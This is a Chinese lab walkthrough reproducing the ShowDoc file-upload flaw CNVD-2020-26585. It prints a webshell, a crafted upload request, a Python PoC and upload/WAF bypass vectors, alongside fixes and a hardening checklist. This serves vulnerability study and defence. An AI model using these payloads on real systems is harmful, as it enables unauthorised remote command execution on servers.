ShowDoc旧版本文件上传漏洞实战复现(CNVD-2020-26585,附PHPStudy环境搭建)
ShowDoc文件上传漏洞深度解析与实战复现指南
1. 漏洞背景与环境搭建
ShowDoc作为一款广受欢迎的在线文档协作工具,曾因文件上传功能的设计缺陷导致严重安全漏洞(CNVD-2020-26585)。这个漏洞的核心在于前端校验可被绕过,允许攻击者上传恶意脚本文件。我们先从基础环境搭建开始。
本地测试环境推荐配置:
| 组件 | 版本要求 | 备注 |
|---|---|---|
| PHPStudy | v8.1或更高 | 集成Apache/MySQL环境 |
| ShowDoc | v2.8.2以下版本 | 漏洞影响版本 |
| Burp Suite | Community/Pro | 用于拦截和修改HTTP请求 |
| 蚁剑 | 最新版 | WebShell管理工具 |
安装PHPStudy后,按以下步骤配置ShowDoc:
- 下载ShowDoc v2.8.1版本(可从GitHub releases获取历史版本)
- 解压到PHPStudy的
WWW目录 - 访问
http://localhost/showdoc完成安装向导 - 创建测试文档页面备用
注意:实验环境请使用虚拟机或隔离网络,避免真实系统受影响
2. 漏洞原理深度剖析
这个文件上传漏洞的特别之处在于它结合了多种安全缺陷:
- 前端校验依赖:仅通过JavaScript验证文件扩展名
- MIME类型混淆:服务端未严格校验Content-Type
- 路径可预测:上传后的文件路径有固定规律
POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain <?php system($_GET['cmd']); ?> ------WebKitFormBoundaryABC123--关键攻击点分析:
- 使用特殊字符
<>绕过基础过滤 - 伪造Content-Type为text/plain
- 利用服务端未清理文件名中的特殊字符
3. 完整复现步骤详解
3.1 准备攻击载荷
创建包含以下代码的PHP文件(如shell.php):
<?php // 简易WebShell if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } else { echo "Server: ".php_uname(); } ?>3.2 Burp Suite拦截修改
- 在ShowDoc上传界面选择任意图片文件
- 开启Burp Suite拦截(Proxy → Intercept on)
- 修改关键请求参数:
- Content-Disposition: form-data; name="editormd-image-file"; filename="test.jpg" + Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" - Content-Type: image/jpeg + Content-Type: text/plain3.3 获取WebShell
成功上传后,响应会包含文件路径:
{ "success": 1, "message": "上传成功", "url": "/Public/Uploads/2023-08/test.<>php" }访问该路径即可执行系统命令:
http://localhost/showdoc/Public/Uploads/2023-08/test.<>php?cmd=whoami4. 防御方案与安全启示
4.1 临时修复措施
对于仍在使用旧版本ShowDoc的用户,建议:
在
application/extra/upload.php中添加严格过滤:$deny_ext = array('php','php5','php4','php3','phtml','htaccess');修改Nginx/Apache配置,禁止执行上传目录的PHP文件
4.2 安全开发建议
文件上传功能的安全检查清单:
- [ ] 服务端文件类型校验(MIME检测)
- [ ] 文件内容签名验证
- [ ] 随机重命名上传文件
- [ ] 设置上传目录不可执行
- [ ] 文件扩展名白名单机制
- [ ] 文件大小限制
经验分享:在实际渗透测试中,遇到文件上传功能时,可以尝试以下测试向量:
- 双扩展名(test.php.jpg)
- 大小写变异(test.PhP)
- 特殊字符注入(test.%00.php)
- 超长文件名
5. 漏洞研究进阶方向
掌握了基础复现方法后,可以进一步探索:
自动化利用脚本开发:使用Python编写PoC
import requests url = "http://target.com/index.php?s=/home/page/uploadImg" files = {'editormd-image-file': ('shell.<>php', '<?php system($_GET[cmd]);?>', 'text/plain')} response = requests.post(url, files=files)权限维持技术:如何将WebShell隐藏得更深
内网渗透路径:通过WebShell进行横向移动
在实际测试中,发现某些WAF会对<>字符进行拦截,此时可以尝试其他特殊字符组合,如:
- 换行符
\n注入 - Unicode编码绕过
- 分块传输编码
最后提醒:所有安全研究都应在合法授权范围内进行,漏洞复现的目的是为了更好地防御。建议在本地搭建的测试环境中练习这些技术,切勿对未授权系统进行测试